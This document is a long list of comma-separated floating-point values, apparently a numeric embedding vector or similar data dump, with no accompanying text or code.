0.005959973,-0.024861215,0.02234025,0.0031049873,-0.011334029,0.013825966,-0.007332122,-0.020978797,0.013520541,0.0047635627,0.0020923638,0.009429642,0.009223281,0.00792941,-0.013415068,-0.016960654,0.002816716,0.0016630352,-0.018928379,-0.04571909,-0.00020107452,0.019176407,-0.007333834,0.014144405,0.008833642,-0.00085546466,-0.0043554925,-0.0147628,-0.016154211,-0.052516628,0.021706196,0.011479793,0.027509822,-0.013693504,0.03713258,0.0025355378,0.007976646,0.008092818,0.01640266,-0.00352976,-0.00520565,-0.002227177,0.0045234794,0.0147558795,0.0011567959,-0.015129607,-0.008614189,-0.012117263,-0.009968296,0.03006841,0.025029104,-0.001227319,0.016405372,0.0105094155,0.020109663,0.0019789254,0.00972173,0.012275437,-0.004531771,0.00484608,0.010284399,-0.026420336,-0.008572121,-0.00002603356,-0.0027245136,-0.013232518,0.011818099,-0.0049844445,-0.009146514,0.02521521,-0.022550307,-0.015817972,-0.015012904,-0.021029491,0.032563858,-0.03000867,0.006838588,-0.006312567,0.025358895,-0.0078054755,0.00823292,0.016054843,-0.0050097206,0.0011981797,-0.0013692508,0.0062203314,0.026199691,-0.0031848152,-0.0074024894,0.0055906847,0.010203137,0.010355446,-0.008414762,0.0013564887,0.014859607,0.025802527,0.0034793084,0.01605905,0.010942222,0.010271157,0.018554512,0.024688186,-0.010014136,-0.0013645125,0.013148212,0.0010028635,0.011834008,-0.0031665245,-0.016344894,0.017643925,-0.008462203,-0.011282227,-0.008396303,0.007529737,-0.005118632,0.01181074,0.004830082,-0.0023969316,-0.019213611,-0.017943418,0.013028338,-0.021984126,0.003723211,0.0073605417,0.015786963,-0.015934497,-0.027430072,-0.010413128,0.017679933,0.013423296,-0.018537644,-0.0055759335,-0.034516767,-0.013489578,0.0005660255,-0.026408127,-0.022266515,-0.0005210085,0.03220606,-0.0035890068,0.021698907,0.007673247,-0.011065067,0.014149484,0.011250417,-0.026455881,0.017939834,-0.0012960546,-0.0042860107,0.002038038,0.03143517,-0.00951448,-0.018028498,-0.0052018757,0.020047158,-0.018750723,-0.006160242,-0.008220199,0.026062163,0.033439625,-0.01045793,-0.034623653,0.008138313,-0.006960432,-0.011137899,0.009250761,-0.023546077,-0.02231435,-0.008935504,-0.0066100857,0.00472512,-0.006196341,-0.005499034,0.0062445356,-0.010535126,-0.00072949496,0.0036700906,0.004790204,0.0021308784,0.0013315227,0.018058414,-0.025766816,-0.007616958,-0.019151015,0.02334556,-0.014811549,0.008696395,-0.03451456,-0.014760794,-0.014813244,0.0022809498,0.012272842,-0.024807448,0.0073112627,-0.0046642288,-0.06727406,0.020583192,-0.0061491095,-0.0028650614,0.007108312,-0.0004507651,-0.009413201,-0.022572508,-0.0099468315,0.0003922745,-0.007242307,0.013192593,-0.0075481907,-0.027978785,0.008581263,-0.011402297,-0.029881004,0.014813644,0.008453084,0.01747042,0.035297815,-0.0050689164,-0.008804475,0.0013158001,-0.0035773898,0.01822416,0.0032649569,-0.03373253,-0.0051210434,-0.011721459,0.0033101123,0.0056447787,0.004891801,-0.0011378356,0.04059259,0.009801975,-0.03056505,0.022215152,0.02219093,-0.016400153,-0.0023876952,-0.009357447,-0.017083798,-0.019379744,0.011123749,-0.0009193005,0.017480414,0.020413935,0.013156047,-0.011024354,0.0038914224,0.0041894782,-0.006056063,0.0036320162,0.016333053,-0.0085530225,-0.0062115667,0.012676835,0.0012041574,-0.013837804,-0.018514084,0.027117306,0.009656518,0.0016995207,-0.0129614165,-0.0062067877,-0.008103473,-0.033052254,0.0004100645,0.0058741095,0.008606304,0.0027198424,-0.0068913964,0.009874987,0.014747224,0.011688482,0.0020475173,0.0032023431,0.007686145,-0.0041698227,-0.0031614315,-0.0040028845,-0.023812357,-0.013251515,0.009002486,-0.04615184,0.018205596,-0.010000578,0.009498018,0.014563732,-0.008829312,0.0048687216,0.006151775,-0.004552457,0.021641724,-0.0057144486,0.01665409,-0.0061279954,0.021088716,0.0047091614,0.011778016,0.00013691215,0.0039003494,0.011801554,-0.002975507,0.004079568,-0.002424437,0.014502775,-0.0013892286,-0.014483068,-0.008016935,-0.004108562,0.01248767,-0.015048327,-0.0099133,0.027586281,0.01617954,-0.016263342,0.0010283708,-0.033279493,-0.00009760506,0.030904192,-0.0028118554,0.030814458,-0.0036060617,0.01211201,0.008488492,-0.0051600593,0.023445696,-0.001981514,-0.052152257,0.012808103,0.024043519,0.003228438,-0.016490776,-0.010169954,0.002026213,0.006662993,0.025563248,-0.0050460002,-0.0053106714,-0.0032943108,0.009967231,-0.0060195476,0.01192225,-0.015761023,-0.022800347,0.010191892,0.0069159367,-0.015605391,0.0007684547,0.0089968825,-0.0035753455,0.0030127077,0.021413386,-0.006479485,0.006209283,-0.0068551665,-0.0129723735,0.014323584,0.0049758023,0.028890919,-0.0011448003,0.0010247104,0.0095212115,-0.025207773,0.00357809,-0.0034786267,-0.017786749,0.00027951392,-0.0062128613,0.012787747,-0.025724499,0.021871611,-0.002728549,-0.027094392,0.009311745,-0.0102506,-0.009767197,-0.016951252,0.023235992,-0.0271174,0.000074683434,0.029892186,-0.010621135,-0.0009868775,-0.015203354,-0.004470902,-0.0029225107,-0.0064865197,0.015732901,-0.009502877,0.0021478927,0.0061021163,-0.011963289,0.0016019784,0.0030187166,-0.0101004075,0.009152524,0.009206342,0.0029516742,-0.0014572772,-0.0073562018,0.018478403,-0.025819827,0.0121516045,-0.0066653667,-0.017401205,-0.0054707606,-0.016137142,-0.011820128,-0.0062514907,-0.009514649,0.032310016,-0.014443003,0.027634919,0.004395163,0.0009039767,0.015918985,-0.014025564,0.00234728,-0.013296122,0.009870659,0.030788882,-0.0011243288,0.011394582,0.009463767,0.009926635,0.004492822,-0.002104204,0.01931131,-0.021235123,-0.027826874,0.0064449664,0.0018970666,0.0010005804,-0.006856362,-0.0138071785,0.0069214804,0.020398756,-0.0027459476,-0.013347084,-0.00891238,0.0012792301,0.003619825,-0.013259336,-0.0057823197,0.00812786,0.07055726,0.005074415,-0.0057749064,-0.01457392,0.020191269,0.0007389719,-0.015918234,-0.008865665,0.02072251,-0.0044498043,-0.01715157,0.013200827,-0.019958831,0.011373846,-0.016771788,-0.012896266,0.010013582,0.0035127425,0.00051032845,0.007957925,-0.0037791398,0.0199329,-0.016921481,-0.03000388,-0.019740101,0.01071631,-0.00027681494,0.007374585,-0.0048624077,0.011295965,-0.0021002495,-0.0071628457,0.011417677,-0.013378224,-0.012889879,-0.015090835,-0.024595106,0.018805925,0.021406684,-0.028672807,0.008995515,0.020036727,-0.018757457,-0.021720544,0.008654941,-0.006850377,-0.010776464,-0.03442314,-0.011051622,-0.00627089,-0.012812353,-0.01132126,0.022823773,-0.0025580393,-0.004257242,0.021502653,0.026563829,-0.0077639935,0.03132253,-0.00401421,-0.021344865,-0.0007214154,0.009783542,0.02997258,0.0027902757,0.009404017,0.0119376965,-0.018756637,0.007507866,-0.0021670486,-0.013856413,-0.014957186,-0.008027883,0.040018965,-0.011137397,-0.0009452562,-0.01686237,0.0092669055,0.00001092103,0.0073722224,-0.019758234,0.029316185,-0.014862337,0.004588345,0.006134534,-0.026463946,-0.012548096,0.010104509,0.02867148,-0.012698664,-0.0012299776,-0.0014720655,0.007029052,-0.014689183,0.0027137918,0.011947694,-0.020077765,-0.0040041567,-0.02091899,0.002736784,0.0186968,-0.02335728,0.015047148,-0.0008451612,-0.011927762,-0.014795142,-0.003487623,-0.003179943,0.006550535,-0.002041375,-0.008164272,-0.00037190237,0.031215329,-0.023871355,0.028603096,-0.015023024,-0.013894339,0.018964339,0.005740292,-0.009097845,-0.023222618,-0.038129035,-0.003139337,0.013354684,0.006875672,0.013069681,0.006695146,0.03684663,-0.003501546,-0.020966336,-0.0058551617,-0.010605176,0.004509569,-0.0009433721,-0.0076081613,0.00469923,-0.028884845,0.004902189,0.0062352517,-0.013250121,-0.008270719,-0.0001561352,-0.009962607,-0.023974856,0.0015837064,0.000900908,0.026611824,-0.0018460962,0.028339079,0.019090038,-0.018891282,-0.010950932,0.000052460608,-0.008267593,0.016834715,-0.0028187467,0.00035649305,-0.007152798,0.00060599827,-0.012913224,-0.004807041,0.012489202,0.008304046,-0.0057952274,0.019557888,-0.041836128,0.012865135,0.03320698,0.012751441,-0.02272772,0.017767565,-0.013265226,0.003014962,0.014421776,-0.027410068,0.011373436,0.01585429,-0.013980415,0.007130697,0.013762436,0.0117189335,-0.01776799,0.06883298,-0.00878305,-0.015902635,-0.008852226,-0.0070381393,-0.030519182,-0.0036383567,0.010434411,-0.0111739235,-0.0008402602,-0.039305393,-0.015746988,0.00798907,-0.024679134,0.0063381186,-0.0052923737,-0.0064958567,0.00057673256,-0.0020184915,-0.022486793,0.023816748,-0.0028683648,-0.0016983704,0.019883469,-0.001011386,0.025869744,0.011437363,0.011023522,-0.014534583,-0.020919593,-0.005262821,-0.014706169,-0.0034744525,0.008982405,-0.0010460538,0.012690156,0.03508045,-0.011990082,-0.019277409,0.0043535116,0.0037544384,-0.031129306,0.09323664,-0.008992311,0.015811337,-0.0017559096,-0.025171224,-0.0024847458,0.039209038,-0.007674133,0.013434579,0.015907511,-0.011090596,-0.00096014264,0.013808571,0.00072317687,0.010615922,0.020236615,0.011630377,0.0009662905,0.00582892,-0.009091795,-0.01585829,0.02166337,0.0011619912,-0.013598603,0.0069015534,-0.024921194,0.00988048,-0.015426598,-0.015750106,0.0032515223,-0.023431966,-0.011246994,0.022293266,-0.010140251,0.039857462,-0.024911668,-0.0026574866,0.003616638,0.009117157,-0.009076214,0.017383104,-0.000108148364,-0.0030022946,-0.01803111,0.018453393,-0.012761123,0.08488669,0.034001693,0.026527606,-0.004676478,0.0092362985,0.027475134,-0.0041149,0.02121685,-0.002431336,0.00958279,0.023129629,0.014124979,-0.0015399695,0.013298361,0.002922336,-0.007764339,-0.013918936,0.013532061,-0.0050182766,-0.0016170312,0.0070159864,0.01604241,0.0128778145,0.0011424999,-0.0053877225,0.002580853,0.00088172796,0.0010978887,0.00917801,-0.0060773054,-0.0025005576,0.018305618,0.009561145,0.0325602,0.017662283,-0.07476461,0.002992283,0.23758085,0.0075364304,0.021744281,0.007256001,0.0030722457,-0.00035602076,-0.094116025,-0.02823028,0.007889699,0.021248545,0.000113434,-0.020502869,-0.0260021,0.009764264,0.00680365,0.017673118,0.006759614,-0.0406614,0.020110585,-0.01847583,0.023705287,-0.006518224,0.005487153,-0.01053024,-0.020374324,-0.0019246391,0.019802028,-0.019216593,0.0070704017,0.0070435875,-0.0045031663,0.0030885285,0.00817054,-0.0016842369,-0.016617019,0.007772061,0.017928733,0.016640931,-0.01613104,-0.014209964,0.013899606,-0.010185251,-0.014163153,-0.027236374,-0.14595816,-0.0007244783,0.017893955,-0.031973828,0.011594125,-0.0053674947,0.013206929,-0.0005905086,-0.0052000475,-0.054565314,0.007993685,-0.016883682,0.012025135,0.017548822,-0.01694598,-0.023109218,-0.003039709,0.0017422077,0.012464119,-0.005049498,0.02132015,-0.008715763,-0.0015321514,-0.0062660696,-0.017962214,0.00016356632,-0.007249566,0.01817857,-0.03275103,0.023464603,-0.0117484685,-0.006017056,0.0039118216,-0.006564544,-0.018683612,-0.023474455,-0.018950073,0.0055426243,-0.005461815,-0.007401963,0.011219659,-0.028018644,-0.005537689,-0.0037908345,-0.005752346,0.02777416,0.021296654,0.005342201,0.004128354,0.012466371,0.047486223,0.0016283132,-0.022745939,-0.00882254,-0.0047408673,0.0060361233,0.0064576697,-0.008184332,-0.00015681314,0.0036094596,-0.016899252,-0.018292965,-0.027893199,-0.018128796,0.021744339,-0.015002258,-0.0039421096,-0.019738348,0.0038229367,0.00736006,-0.009208763,0.0017705243,0.023624798,-0.02738582,0.013887231,0.034388814,0.0019314202,0.00033612826,-0.0053635347,-0.014654235,-0.017038833,-0.020407379,0.0036632388,-0.022865912,-0.010434697,0.0006011802,-0.013102827,0.0038314555,0.00078732666,0.004492933,0.0034814663,0.024357343,0.000562926,-0.006855135,-0.013624152,0.007048568,0.03315386,0.0143342,-0.048202433,0.015751999,-0.008844433,-0.010621517,-0.020448403,0.01991951,-0.022310572,-0.0015446077,-0.013430327,-0.020807581,-0.026410215,-0.0067772437,0.010515914,0.014094179,0.0076606073,-0.023334863,-0.011673722,-0.027435333,0.01160988,0.003823072,0.0079141315,-0.01614245,-0.013703934,-0.021508386,0.0027681019,-0.004575327,0.028817898,-0.015809232,-0.027403006,-0.007005916,-0.0049237157,-0.023989981,-0.010154515,0.010879556,-0.0038007384,0.011317266,-0.00029464567,0.0031751154,-0.0011347408,0.0008599172,-0.023117907,-0.004197988,-0.0011537226,-0.010194877,-0.0104144085,-0.024529234,0.039433107,-0.0003739486,0.032023326,-0.0044886484,0.03131765,0.005094339,0.0041321777,0.027218612,-0.0044736452,-0.007703843,-0.01754365,0.099897064,-0.0039992016,-0.024342377,0.019902177,-0.0030555343,-0.006636006,0.01905292,-0.0175358,-0.008048841,-0.025046522,-0.037248705,-0.0018203179,-0.0019167686,0.0016614015,-0.02431401,0.012845205,0.0076029287,0.012879563,0.0029409365,0.007084703,0.006818725,-0.015571944,-0.0036046728,0.04239677,0.015610224,0.0065681753,0.007400699,-0.010585874,-0.017992347,-0.008371048,-0.0022175196,-0.00071638764,0.011863543,-0.004727473,0.009898623,-0.039097134,-0.014211452,0.009036763,-0.0070009883,-0.0020421797,-0.012393655,-0.0040194825,0.025783693,-0.025286697,0.0053673293,-0.020015892,-0.01959753,0.03172892,0.0014543264,0.022904646,-0.0026871804,0.020071188,0.0015610054,-0.016336987,0.010088546,-0.021970253,0.020185148,-0.00680012,0.0013540077,0.0014553721,0.01124051,-0.008854922,-0.011834079,0.013960583,0.0022304798,-0.00016356382,0.025184834,0.01861633,0.009192589,0.03352643,-0.0010277416,0.008224744,0.014879716,0.022258025,-0.0067414385,-0.010296021,-0.03926084,0.0039825854,0.0057104267,0.005143024,0.012378787,-0.00696692,0.013873226,0.0064895586,-0.027370026,-0.05831359,-0.004946079,0.012567222,-0.037366237,0.009507007,0.0114482995,0.004880185,0.011969065,0.007037,0.000067663845,-0.019489458,0.0005091151,0.0065808445,0.01289085,0.017977702,0.009569718,0.016526831,-0.016188538,0.00012273788,-0.013805141,-0.021475242,-0.0012539347,-0.029818173,-0.007364187,-0.034514256,-0.009440896,-0.009159778,0.016990218,-0.013291462,0.013801569,0.031838004,-0.038503755,0.0021801735,0.0044429717,-0.013551188,-0.015520588,-0.01526563,0.004424607,-0.015162563,0.034059707,0.0076982896,-0.01183876,0.016141335,-0.021951333,0.0077558365,-0.010829254,0.020717971,-0.0153039405,0.0094502,-0.008236155,0.0023934953,0.005874985,0.013631863,-0.005517992,0.0031897305,-0.010029136,0.008000824,-0.013346515,-0.0062389937,0.007834797,0.011279159,0.0034646527,-0.022566715,-0.011625608,0.015616411,-0.0034870543,-0.004227557,0.0032547703,-0.002934284,0.0044719516,0.01152733,-0.018687528,0.0022021222,0.0048196376,-0.010795365,-0.0000670103,0.020419292,-0.003437883,-0.02513458,-0.01598696,0.03453443,0.011522398,-0.019073868,0.022473285,0.003934879,-0.016264964,-0.032553688,-0.008009046,0.006072491,-0.010312174,-0.0036484336,-0.0056448886,-0.021173202,-0.021327728,0.01752944,0.022174794,0.01292189,-0.011442964,-0.01137481,0.016656805,-0.0041382737,0.0039908355,0.023712538,-0.0017425055,-0.0016405565,-0.0077879094,0.013213375,0.010640019,-0.013532036,-0.03942356,-0.0066700703,0.0064588627,-0.017451035,0.008347936,0.00032605714,0.008922661,0.021444017,-0.0110702,-0.031559084,0.016903466,0.0019601448,-0.008314271,0.0102039715,-0.019772077,0.013130405,-0.019431867,-0.010248644,-0.022329768,-0.009771431,0.007104223,0.0077299373,-0.011713484,0.010343667,-0.019147305,-0.025730778,-0.0061411993,0.011583958,0.016347447,0.008048128,-0.017039208,-0.020444598,-0.0022313118,0.04139404,-0.018712025,-0.006983956,0.0040866197,0.028472865,0.009693059,-0.026040794,0.003178268,-0.021478005,-0.0068518072,-0.0050297165,-0.018849464,-0.00037306538,-0.004428254,-0.0063813822,-0.027883785,0.007846632,-0.00450306,-0.01280608,-0.0068231113,-0.0092606805,0.0019543238,0.0117815565,0.0071778684,-0.016187783,-0.017835159,-0.023181997,0.010200618,-0.01632256,-0.0040876414,-0.004532993,0.00067941414,-0.01771652,-0.018877767,-0.0060217804,-0.02066626,-0.0028306283,-0.0007598486,0.007062728,0.0060018366,0.012946664,0.0010941362,0.0037604838,-0.020520866,-0.0019714225,-0.010247014,0.009795175,-0.011914141,0.0054860003,0.0042786477,-0.015834916,0.0054322258,-0.015558394,0.0041615423,0.016069578,0.018567786,0.0066251797,0.0015360675,-0.004231048,0.017271468,-0.017902272,-0.009424718,-0.010599729,-0.017626824,0.0010114298,0.009895354,0.0007218537,-0.012625323,-0.0069208294,-0.0008432647,-0.02460058,0.023916146,0.01299916,0.00949561,-0.016361473,-0.010867264,0.01043281,-0.016723538,0.0058692517,0.007043337,-0.0130698,0.011129601,-0.017204996,-0.0019482408,-0.012242671,-0.0016459607,-0.010528855,-0.010706586,-0.012715346,-0.019233217,0.023575932,0.019210752,-0.011118048,-0.0059976825,0.0060148644,0.004003094,0.01780635,0.009651471,-0.0056027006,-0.022977207,0.014651241,0.0069260504,0.015400302,-0.0023737436,-0.02253166,-0.00003754721,-0.18991558,0.0042657563,0.016728835,-0.026945824,-0.011595976,-0.006348244,0.002037984,0.07309063,-0.0023539974,-0.021298347,-0.014217059,0.0197904,0.011306347,0.0019505761,0.0025318777,0.028061392,-0.022244107,-0.036360748,0.0003144598,0.0025380508,0.009069803,0.021923909,0.017264102,0.014045711,0.007573393,0.012877036,-0.003537931,0.0205878,0.016120762,0.006440919,-0.00029577356,-0.009152844,-0.00094692915,0.008286627,-0.01833305,0.009375106,-0.009123239,-0.0034643582,-0.008808063,-0.0007243856,-0.010661149,-0.017350934,-0.006173033,0.04594117,-0.00028334517,0.0049176556,0.030002993,-0.0024541984,-0.008857086,0.00542825,-0.0031628204,-0.024370147,0.033425573,0.035813373,-0.0075314273,0.0009088281,-0.030151892,0.016875435,0.010472165,-0.012665753,0.0021166047,0.015528066,0.0058304723,-0.0011951502,-0.017796936,-0.0011484973,0.00057702593,-0.011109038,0.0012572812,-0.0033153219,0.0016295752,0.022429336,-0.0015040347,0.011731541,-0.02428029,0.0072972444,0.024741588,0.014268868,0.0029873054,0.010473741,0.008804826,0.007547803,0.0030037097,0.038755443,-0.00316087,0.0063031344,-0.0070520365,0.0020756996,-0.014461972,-0.0059230207,0.015477457,0.016762827,-0.01661693,-0.028473414,-0.001314809,-0.0011622136,-0.002697332,0.036143765,0.017589798,0.0041677584,0.001692633,-0.005372052,0.009009576,-0.009806099,-0.1306921,-0.0043830206,0.019739281,0.0029034682,-0.011415597,-0.009857786,-0.002577598,-0.0031354295,0.021548131,-0.0010635612,-0.016266895,0.028265469,0.016347133,0.005739821,-0.013506777,0.004722609,-0.030686757,0.010069838,-0.0004705844,-0.008478323,0.022069989,-0.019240994,-0.019169291,-0.009099629,0.010152362,-0.006968862,-0.009634714,0.028401894,0.02432836,-0.015162348,-0.008604339,0.011228734,-0.012935148,0.030385539,-0.013799138,-0.02588156,0.016143316,-0.013805209,0.001594986,0.006325032,0.0040851557,-0.0050856248,0.00465859,-0.0075575938,0.0064513967,-0.015057962,-0.0010391764,0.0167229,0.024354385,0.001696636,-0.0055163302,0.008611855,-0.00086038327,-0.012836114,0.01948885,-0.008361409,-0.006175816,-0.005161461,-0.0011991167,0.027536491,-0.018571848,0.000993539,0.0098679,-0.0004202823,-0.0047591194,0.022461923,-0.00093055016,-0.016045395,0.008271967,-0.009550927,-0.010899963,0.005587539,0.03380212,-0.0034652126,0.024990575,0.021265639,-0.018481102,0.01788716,0.02191154,0.0019583167,-0.007876367,-0.012161049,-0.01713404,0.018904364,-0.009636426,-0.015364202,-0.000051717707,0.006841036,0.00251844,0.020360107,0.0029060913,0.017926985,-0.020958768,0.0022648976,0.008003419,0.014548475,0.010475734,-0.00684842,-0.021021532,0.006494834,-0.022969883,0.0056179627,-0.01841841,-0.0065156864,-0.021964742,-0.008212942,0.00935686,-0.012476541,-0.011704522,0.007916397,0.019333858,0.026338601,-0.034514654,-0.00206186,-0.034197647,0.0013451995,-0.013211714,-0.026699087,-0.00039733335,0.019182956,0.0012155169,0.018954067,-0.010617514,0.012563651,-0.013551119,0.006956504,-0.0100420965,0.018049348,-0.000097423,-0.0028151707,-0.007254239,0.00522421,0.009505218,-0.038293336,-0.0011527757,0.0021026975,-0.00003771747,-0.0033642715,-0.012625817,-0.0047111153,0.011667434,-0.0051335557,0.0037437938,-0.002530128,-0.018222649,-0.026472177,0.0012781629,0.008200478,0.01131683,0.011199753,-0.014662757,-0.009573933,0.00059146713,0.013684315,-0.021065354,0.009728161,-0.014862896,-0.012268351,0.009317816,0.0013514649,-0.0060884925,-0.0021159207,0.004568914,-0.02375233,0.008711475,-0.004352531,0.0002533613,-0.011008388,0.003745076,-0.0009806288,0.002668798,0.001065694,0.007545136,0.012706379,0.019272212,0.008693571,0.016787397,0.021666966,0.014252856,0.02389911,0.019343039,0.0064039906,0.0101689035,-0.0026876477,0.0034189972,0.0068276664,0.0020653892,0.024724996,-0.012051375,-0.0050705126,0.02771697,-0.0025344496,0.009076444,-0.0037189822,-0.0049993,0.009762875,-0.0051238923,-0.011267478,0.014819582,-0.025540685,-0.0064559327,0.028125659,0.00912057,-0.018962713,0.008700136,-0.0014959733,0.0062296097,0.02111111,0.035752505,-0.0011212137,0.00829617,-0.019763805,0.023807315,-0.007713273,0.020405503,0.024950996,-0.014757137,-0.014755607,0.022576172,0.03268603,0.005869811,-0.013818043,0.0043620123,-0.0028744375,0.014903447,0.048203547,0.02133077,-0.004835971,-0.02243897,-0.015656414,0.0104702925,0.03373871,-0.011138943,0.021387601,-0.02423092,0.020215496,0.033870358,0.0012765961,-0.019424034,0.001053855,0.0087555135,0.037987225,0.023890665,0.0033408322,-0.005731543,0.0009027904,-0.0061172238,0.0005610596,-0.015640106,0.020189181,0.008697661,-0.010476008,-0.012494214,-0.002094812,-0.009177518,0.01115748,0.021924138,-0.004417075,0.013136335,0.014692608,-0.013220004,-0.015566627,-0.024103206,0.034596745,0.008251441,-0.008858702,0.01533835,-0.0150298625,-0.012545927,0.0060132598,0.004980694,-0.016922524,-0.008380636,0.030396504,0.030013483,-0.004271142,-0.030385556,0.0067874035,-0.011284561,0.006104361,-0.017553505,-0.016456293,-0.008033349,0.010357381,-0.0073084612,-0.0123283435,-0.008793921,0.0025024593,0.009757052,-0.00993957,0.0076930136,-0.005942662,0.0017260646,-0.024658227,-0.0095901415,0.019087555,0.025839081,-0.0110594705,-0.0058876467,0.0027905144,0.00074258226,0.0027582627,0.0135671655,0.0035201323,0.012870631,-0.009184675,-0.006225436,0.005460782,-0.01898029,-0.016709447,0.026870903,0.0041875876,-0.011933258,0.012114586,0.004997159,-0.00809115,0.010311301,-0.002894418,-0.012323968,-0.0049338206,-0.006913435,-0.0076934104,0.038381785,0.008715202,0.023116108,-0.0015489145,-0.00067244424,-0.005387268,-0.00518837,-0.00023997697,0.011008586,0.0493565,-0.0038107398,-0.023579383,0.015160226,-0.00011356854,0.023411503,0.013020556,0.011276459,0.0021912889,0.012933692,0.015803503,-0.0037470188,-0.024945237,-0.010386856,0.008294038,0.005945921,-0.0035772868,0.026923863,0.00074680796,0.00013359675,0.00027534514,-0.0075092968,0.0238137,0.010111698,0.009970451,-0.023802394,0.01094096,0.0008115894,-0.0097003365,-0.023659458,0.015071682,-0.019233555,-0.001607914,-0.005951463,-0.02724902,0.0020707515,-0.005631145,-0.004248019,0.008326731,-0.010502195,0.0074832365,-0.0061074924,-0.014664561,-0.014375773,-0.060937922,0.0072643147,0.032330118,-0.010891077,0.026689878,-0.0007424624,-0.01689623,-0.0031319798,-0.0037741938,0.012259021,-0.011655195,-0.013307635,-0.001992296,0.018051898,0.024489999,0.004805526,0.008890448,-0.011126011,0.015975395,-0.00600705,-0.009725512,0.017217798,0.0059657423,0.0020021468,-0.003613289,-0.01828675,0.00054308167,-0.011491255,-0.010024119,-0.0060992735,-0.0006058864,0.0041244677,-0.0013779214,-0.022422524,-0.008032228,0.010404827,-0.010140801,0.008853195,-0.012627092,-0.024089925,-0.010556173,-0.0049568415,0.009955288,-0.009023509,-0.0025395728,0.016530033,-0.037700497,-0.013824793,-0.013149959,-0.014456338,0.0061191344,0.014824145,-0.011492234,0.028619532,-0.0030030003,0.008107645,0.013778428,-0.017282844,0.031685058,0.0045897854,-0.029036509,-0.00076002994,0.026212918,-0.00822004,0.00028849434,0.0028339403,-0.0075360863,0.04086137,-0.0051515535,0.0038760745,0.030813245,-0.027467277,-0.0057195458,0.0063960073,0.0065761474,0.01636455,-0.00557489,0.004662037,0.02053839,0.016645718,0.000993379,-0.0036769784,-0.0028852248,0.027055345,0.016392114,0.020803735,-0.017761597,0.027399907,0.03129916,0.0021282672,0.0120955175,-0.0022477943,-0.013949688,-0.009492719,-0.005832841,0.022971015,-0.008402489,-0.0071116993,0.011735678,0.010882568,-0.014985081,-0.013722803,0.0052212942,-0.012483247,0.017612107,-0.0029877014,-0.0018334214,0.010668933,0.012369661,0.012282903,-0.020336544,0.02416585,-0.008120827,0.030474441,0.022933668,0.0089051565,-0.01020086,0.022864,-0.023269309,-0.0090385,-0.018031958,-0.02522602,-0.0021998328,0.0072931508,0.01705424,-0.0020055766,-0.0064373654,-0.026772078,-0.004727617,-0.0050840024,-0.015035999,0.027476287,0.012907681,0.03480528,-0.0004099155,0.00644121,-0.0132273175,-0.0024315051,-0.01284489,0.01410038,-0.013280315,-0.035242084,0.0022118594,-0.0049032,-0.0014873326,0.033775758,-0.002884096,-0.025532959,-0.008775305,-0.011606544,0.015922327,-0.022792332,0.0072830627,-0.00015641717,-0.004107251,-0.017362349,0.018590601,0.0025060629,0.018802525,-0.014988352,-0.0006194346,0.014421244,0.005769142,0.0072373934,0.006158055,0.0024715557,0.011183835,0.014736498,-0.016863791,-0.050692786,0.0038676958,-0.000069420435,0.0060821995,-0.00492424,-0.003248003,-0.00012783078,0.018734375,-0.012775343,0.0074120653,-0.031194517,-0.009220614,0.00906962,0.004218612,-0.004033712,-0.0283589,0.0036303482,-0.0041423123,0.008958457,-0.013065814,-0.01905449,-0.009771959,0.0071553974,0.008594779,0.022366762,-0.012331679,-0.017358296,0.011775069,0.007275147,-0.018670574,0.026968347,-0.023689194,0.009530606,0.023085017,0.021814415,0.0022647225,-0.0042853886,-0.0010815387,-0.0077558225,-0.0024199735,0.0039362507,0.009480779,-0.004474396,0.0033957623,0.11222205,0.011611181,-0.032404333,0.003264255,0.00067776593,0.013051601,0.028007878,0.0008192944,0.00013371874,0.012919504,0.0040411726,-0.017351817,0.008556377,0.0021798974,-0.0014235071,0.035677947,0.024126383,-0.00469228,-0.010680081,-0.01667638,0.032705326,-0.008996675,-0.004871935,0.025802735,0.000013176433,-0.027546199,-0.0027723385,0.03444164,-0.0077390447,0.018650727,0.021071913,0.01632173,0.008471867,0.00858766,-0.023686677,0.005238551,0.000099347606,0.001661762,-0.0025909487,-0.007640427,0.030863099,0.016849102,0.007508528,-0.03210364,-0.012741318,0.015344946,0.006310434,0.005340377,0.023472695,-0.011814095,0.007134045,0.010694265,0.015408102,-0.0030490665,0.002389666,0.004711433,-0.0034840286,-0.006354207,0.0045592734,-0.013745506,0.032666195,0.00096573745,-0.0072221057,0.012410635,0.031987954,-0.008470543,-0.005067219,0.0031926655,-0.030282008,-0.03842251,0.038496085,-0.008489499,0.012467386,0.02140994,-0.040220194,0.0083770165,-0.0071129403,-0.031053968,0.0021038326,-0.000059335347,0.00901907,0.005128598,0.018090475,-0.00423762,0.018786035,0.013276849,0.0013873107,-0.0003279238,-0.012822861,-0.002788506,0.009012129,0.021588553,0.008594325,0.0040142513,-0.009546496,-0.0022468935,0.0076463954,-0.009000725,0.015652122,0.007888523,0.014732255,-0.00838872,-0.018014893,0.0066930205,-0.009676221,-0.008125355,-0.003182122,0.009354583,-0.01720933,0.004467663,0.003950479,0.0015538649,0.015078293,-0.0072802072,0.0020296196,-0.004081819,0.0016862345,-0.02705758,0.030719407,-0.0024220431,-0.023862159,0.003053134,0.01607052,0.026554404,0.01899161,0.0018134478,-0.0071340012,-0.010501056,0.01964802,-0.0025536981,-0.00084589736,-0.044530343,-0.01994649,-0.003396611,-0.004286789,0.0018528723,0.019643486,0.009605677,0.009992012,-0.012821153,-0.00043122415,0.0024081164,-0.015077758,0.010710216,0.018485408,-0.012590104,0.0033077735,-0.017430637,0.026143689,0.010291256,-0.011789862,0.015065395,-0.0050189323,0.0008729443,-0.015380411,-0.020820808,0.0042455173,-0.010448669,-0.0065660663,-0.0147264525,0.018310424,0.004429652,0.006549201,-0.0457502,0.0077506574,-0.008388253,0.0031257079,0.017939545,0.0016291224,0.0007571945,0.0015824253,-0.021697856,-0.008099589,0.025737528,0.0023154377,-0.007537561,0.024616186,0.0142026385,-0.011207739,-0.0036961117,-0.0011784165,0.03522132,-0.020440985,0.03511054,0.013746758,-0.009607917,0.0136881275,0.005819974,0.007130271,0.019075934,-0.02454636,0.01845599,-0.0017294679,0.014460836,0.0047713676,0.00403692,-0.022075253,0.04607846,-0.016530076,-0.05082893,-0.001363317,-0.005046654,0.0048723044,0.010239955,0.013283766,0.0085619595,0.0035904227,-0.012154305,-0.014726918,0.005254469,0.012552291,0.004809351,-0.011838019,-0.012853711,0.0036620863,0.012182611,-0.020629566,0.00044496296,-0.0018767068,-0.0055022226,0.012613996,-0.021894678,-0.02024433,-0.010311528,0.012316764,-0.021953823,0.01228465,0.015547918,0.0222709,0.0016080108,0.011497123,0.02493446,-0.013555627,-0.02288684,-0.0072028534,